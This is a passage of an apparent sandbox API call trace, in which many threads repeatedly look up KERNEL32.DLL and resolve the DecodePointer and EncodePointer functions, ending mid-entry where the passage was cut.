SysReAllocStringLen (in: pbstr=0x965f82c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x965f82c*="KERNEL32.DLL") returned 1 [0179.663] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0179.664] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0179.666] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0179.667] SysReAllocStringLen (in: pbstr=0x965f82c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x965f82c*="KERNEL32.DLL") returned 1 [0179.667] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0179.667] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0179.670] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0179.670] SysReAllocStringLen (in: pbstr=0x965f808*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x965f808*="KERNEL32.DLL") returned 1 [0179.670] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0179.670] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0179.673] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0179.676] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0179.991] SysReAllocStringLen (in: pbstr=0x965fae0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x965fae0*="KERNEL32.DLL") returned 1 [0179.991] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0179.992] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0179.995] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 190 os_tid = 0xb84 [0179.726] SysReAllocStringLen (in: pbstr=0x732f3e4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x732f3e4*="KERNEL32.DLL") returned 1 [0179.726] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0179.726] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0179.729] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0179.730] SysReAllocStringLen (in: pbstr=0x732f3e4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x732f3e4*="KERNEL32.DLL") returned 1 [0179.730] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0179.730] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0179.733] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0179.733] SysReAllocStringLen (in: pbstr=0x732f3c0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x732f3c0*="KERNEL32.DLL") returned 1 [0179.733] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0179.734] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0179.737] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0179.739] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0180.100] SysReAllocStringLen (in: pbstr=0x732f698*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x732f698*="KERNEL32.DLL") returned 1 [0180.101] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0180.101] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0180.105] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 202 os_tid = 0x878 [0190.785] SysReAllocStringLen (in: pbstr=0x955f77c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x955f77c*="KERNEL32.DLL") returned 1 [0190.785] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0190.787] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0190.790] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0190.791] SysReAllocStringLen (in: pbstr=0x955f77c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x955f77c*="KERNEL32.DLL") returned 1 [0190.791] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0190.791] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0190.795] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0190.795] SysReAllocStringLen (in: pbstr=0x955f758*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x955f758*="KERNEL32.DLL") returned 1 [0190.795] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0190.796] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0190.799] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0190.803] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0191.109] SysReAllocStringLen (in: pbstr=0x955fa30*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x955fa30*="KERNEL32.DLL") returned 1 [0191.109] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0191.110] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0191.113] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 203 os_tid = 0x40c [0190.859] SysReAllocStringLen (in: pbstr=0x970f43c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x970f43c*="KERNEL32.DLL") returned 1 [0190.859] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0190.860] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0190.864] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0190.864] SysReAllocStringLen (in: pbstr=0x970f43c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x970f43c*="KERNEL32.DLL") returned 1 [0190.864] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0190.865] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0190.868] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0190.869] SysReAllocStringLen (in: pbstr=0x970f418*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x970f418*="KERNEL32.DLL") returned 1 [0190.869] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0190.869] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0190.872] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0190.874] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0191.364] SysReAllocStringLen (in: pbstr=0x970f6f0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x970f6f0*="KERNEL32.DLL") returned 1 [0191.364] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0191.364] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0191.367] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 204 os_tid = 0x3c4 [0191.646] SysReAllocStringLen (in: pbstr=0x732f8b4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x732f8b4*="KERNEL32.DLL") returned 1 [0191.646] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0191.647] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0191.650] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0191.651] SysReAllocStringLen (in: pbstr=0x732f8b4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x732f8b4*="KERNEL32.DLL") returned 1 [0191.651] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0191.651] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0191.655] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0191.655] SysReAllocStringLen (in: pbstr=0x732f890*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x732f890*="KERNEL32.DLL") returned 1 [0191.655] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0191.656] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0191.660] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0191.663] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0192.171] SysReAllocStringLen (in: pbstr=0x732fb68*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x732fb68*="KERNEL32.DLL") returned 1 [0192.171] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0192.171] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0192.176] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 205 os_tid = 0x7d4 [0192.451] SysReAllocStringLen (in: pbstr=0x956f374*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x956f374*="KERNEL32.DLL") returned 1 [0192.451] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0192.452] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0192.455] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0192.455] SysReAllocStringLen (in: pbstr=0x956f374*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x956f374*="KERNEL32.DLL") returned 1 [0192.455] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0192.456] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0192.459] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0192.459] SysReAllocStringLen (in: pbstr=0x956f350*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x956f350*="KERNEL32.DLL") returned 1 [0192.459] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0192.460] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0192.463] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0192.466] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0193.073] SysReAllocStringLen (in: pbstr=0x956f628*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x956f628*="KERNEL32.DLL") returned 1 [0193.073] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0193.074] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0193.076] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 206 os_tid = 0x630 [0193.056] SysReAllocStringLen (in: pbstr=0x72ef6e4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x72ef6e4*="KERNEL32.DLL") returned 1 [0193.056] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0193.058] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0193.061] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0193.061] SysReAllocStringLen (in: pbstr=0x72ef6e4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x72ef6e4*="KERNEL32.DLL") returned 1 [0193.061] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0193.062] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0193.064] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0193.065] SysReAllocStringLen (in: pbstr=0x72ef6c0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x72ef6c0*="KERNEL32.DLL") returned 1 [0193.065] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0193.065] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0193.068] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0193.070] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0193.078] SysReAllocStringLen (in: pbstr=0x72ef998*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x72ef998*="KERNEL32.DLL") returned 1 [0193.078] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0193.079] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0193.081] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 207 os_tid = 0x6c8 [0193.655] SysReAllocStringLen (in: pbstr=0x959faec*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x959faec*="KERNEL32.DLL") returned 1 [0193.655] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0193.656] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0193.658] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0193.659] SysReAllocStringLen (in: pbstr=0x959faec*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x959faec*="KERNEL32.DLL") returned 1 [0193.659] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0193.659] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0193.662] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0193.662] SysReAllocStringLen (in: pbstr=0x959fac8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x959fac8*="KERNEL32.DLL") returned 1 [0193.662] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0193.662] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0193.665] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0193.668] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0193.750] SysReAllocStringLen (in: pbstr=0x959fda0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x959fda0*="KERNEL32.DLL") returned 1 [0193.750] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0193.751] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0193.753] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 210 os_tid = 0x314 [0195.904] SysReAllocStringLen (in: pbstr=0x72efad4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x72efad4*="KERNEL32.DLL") returned 1 [0195.904] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0195.907] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0195.910] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0195.910] SysReAllocStringLen (in: pbstr=0x72efad4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x72efad4*="KERNEL32.DLL") returned 1 [0195.910] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0195.911] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0195.914] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0195.914] SysReAllocStringLen (in: pbstr=0x72efab0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x72efab0*="KERNEL32.DLL") returned 1 [0195.914] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0195.915] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0195.917] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0195.920] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0196.615] SysReAllocStringLen (in: pbstr=0x72efd88*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x72efd88*="KERNEL32.DLL") returned 1 [0196.615] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0196.616] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0196.619] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 211 os_tid = 0x25c [0197.022] SysReAllocStringLen (in: pbstr=0x63ff80c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x63ff80c*="KERNEL32.DLL") returned 1 [0197.022] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0197.023] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0197.026] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0197.026] SysReAllocStringLen (in: pbstr=0x63ff80c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x63ff80c*="KERNEL32.DLL") returned 1 [0197.026] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0197.027] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0197.029] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0197.029] SysReAllocStringLen (in: pbstr=0x63ff7e8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x63ff7e8*="KERNEL32.DLL") returned 1 [0197.029] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0197.030] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0197.032] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0197.035] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0197.068] SysReAllocStringLen (in: pbstr=0x63ffac0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x63ffac0*="KERNEL32.DLL") returned 1 [0197.068] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0197.069] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0197.072] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 214 os_tid = 0x7ec [0197.831] SysReAllocStringLen (in: pbstr=0x95cf86c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x95cf86c*="KERNEL32.DLL") returned 1 [0197.831] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0197.831] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0197.834] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0197.834] SysReAllocStringLen (in: pbstr=0x95cf86c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x95cf86c*="KERNEL32.DLL") returned 1 [0197.834] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0197.834] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0197.837] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0197.837] SysReAllocStringLen (in: pbstr=0x95cf848*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x95cf848*="KERNEL32.DLL") returned 1 [0197.837] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0197.838] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0197.840] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0197.843] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0198.086] SysReAllocStringLen (in: pbstr=0x95cfb20*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x95cfb20*="KERNEL32.DLL") returned 1 [0198.086] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.087] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.090] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 215 os_tid = 0x7fc [0198.164] SysReAllocStringLen (in: pbstr=0x10bdf6f4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x10bdf6f4*="KERNEL32.DLL") returned 1 [0198.164] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.165] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.167] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0198.168] SysReAllocStringLen (in: pbstr=0x10bdf6f4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x10bdf6f4*="KERNEL32.DLL") returned 1 [0198.168] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.168] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.171] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0198.171] SysReAllocStringLen (in: pbstr=0x10bdf6d0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x10bdf6d0*="KERNEL32.DLL") returned 1 [0198.171] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.171] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.174] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0198.177] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0198.352] SysReAllocStringLen (in: pbstr=0x10bdf9a8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x10bdf9a8*="KERNEL32.DLL") returned 1 [0198.352] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.353] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.356] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 216 os_tid = 0xb58 [0198.431] SysReAllocStringLen (in: pbstr=0x95bf624*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x95bf624*="KERNEL32.DLL") returned 1 [0198.431] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.432] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.434] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0198.435] SysReAllocStringLen (in: pbstr=0x95bf624*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x95bf624*="KERNEL32.DLL") returned 1 [0198.435] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.435] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.438] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0198.438] SysReAllocStringLen (in: pbstr=0x95bf600*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x95bf600*="KERNEL32.DLL") returned 1 [0198.438] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.438] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.441] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0198.443] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0198.813] SysReAllocStringLen (in: pbstr=0x95bf8d8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x95bf8d8*="KERNEL32.DLL") returned 1 [0198.813] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.814] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.816] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 217 os_tid = 0xaac [0198.833] SysReAllocStringLen (in: pbstr=0x96ef35c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x96ef35c*="KERNEL32.DLL") returned 1 [0198.833] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.833] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.836] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0198.836] SysReAllocStringLen (in: pbstr=0x96ef35c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x96ef35c*="KERNEL32.DLL") returned 1 [0198.836] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.837] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.839] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0198.839] SysReAllocStringLen (in: pbstr=0x96ef338*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x96ef338*="KERNEL32.DLL") returned 1 [0198.839] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0198.840] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0198.842] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0198.845] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0200.761] SysReAllocStringLen (in: pbstr=0x96ef610*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x96ef610*="KERNEL32.DLL") returned 1 [0200.761] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0200.761] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0200.764] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 218 os_tid = 0xba8 [0199.023] SysReAllocStringLen (in: pbstr=0x10b4f78c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x10b4f78c*="KERNEL32.DLL") returned 1 [0199.024] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0199.024] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0199.027] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0199.028] SysReAllocStringLen (in: pbstr=0x10b4f78c*=0x0, psz="KERNEL32.DLL", len=0xc | out: 